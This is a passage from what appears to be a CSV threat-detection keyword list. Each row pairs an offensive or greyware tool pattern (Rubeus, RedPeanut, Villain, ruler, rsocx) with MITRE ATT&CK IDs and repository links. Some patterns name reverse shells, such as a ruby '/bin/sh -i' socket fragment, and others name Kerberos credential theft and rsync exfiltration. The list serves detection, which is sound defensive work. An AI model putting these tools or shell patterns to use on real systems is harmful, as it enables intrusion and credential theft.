- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*rsocx -l 0.0.0.0*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsocx -r *:*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsocx -t 0.0.0.0*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsocx.exe* 0.0.0.0*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsocx.exe* 127.0.0.1*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsocx-main.zip*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsync -r * *@*:*,greyware_tool_keyword,rsync,Detects the use of tools that copy files from or to remote systems,T1041 - T1105 - T1106,TA0002 - TA0008 - TA0010,N/A,N/A,Data Exfiltration,https://attack.mitre.org/techniques/T1105/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*rsync -r *@*:* *,greyware_tool_keyword,rsync,Detects the use of tools that copy files from or to remote systems,T1041 - T1105 - T1106,TA0002 - TA0008 - TA0010,N/A,N/A,Data Exfiltration,https://attack.mitre.org/techniques/T1105/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*RtlDallas/KrakenMask*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,1,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -*RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*rubber_ducky.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Rubeus*currentluid*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus*harvest*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus*logonsession*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus*monitor*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus.bin*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Rubeus.Commands*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*Rubeus.exe*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*Rubeus.git*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus.Kerberos*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus.lib*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*rubeus.txt*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusAskTgtMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusASREPRoastManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusChangePwManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusCreateNetOnlyManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusDescribeManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusDumpManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusDumpMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusHarvestManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusHarvestMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusHashManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusKerberoastManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusKerberoastMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusKlistManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusMonitorManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusMonitorMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusPttManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusPttMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusPurgeManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusPurgeMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusRenewManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusRenewMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusS4UManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusS4UMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusTgtDelegManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusTgtDelegMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusTriageManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*ruby CVE-202*-*.rb *,offensive_tool_keyword,POC,CVE-2023-34362: MOVEit Transfer Unauthenticated RCE,T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003,TA0005 - TA0001 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sfewer-r7/CVE-2023-34362,1,0,N/A,N/A,1,62,24,2023-06-13T08:46:03Z,2023-06-12T12:56:12Z -*ruby poc-cve-202*-*.rb*,offensive_tool_keyword,POC,CVE-2023-34362: MOVEit Transfer Unauthenticated RCE,T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003,TA0005 - TA0001 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sfewer-r7/CVE-2023-34362,1,0,N/A,N/A,1,62,24,2023-06-13T08:46:03Z,2023-06-12T12:56:12Z -*ruby -rsocket *TCPSocket.open(*exec sprintf*/bin/sh -i *,greyware_tool_keyword,ruby,ruby reverse shell,T1071 - T1071.004 - T1021,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*ruby_nntpd_cmd_exec*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*ruby_no_sh_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*ruby_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*Rudrastra-main.zip*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,1,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*ruler * abk dump -o *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ruler -k -d * brute --users *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ruler-linux64*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*ruler-linux86*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*ruler-osx64*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*ruler-win64.exe*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*ruler-win86.exe*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*rules/d3ad0ne.rule*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*run * pyshell*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - 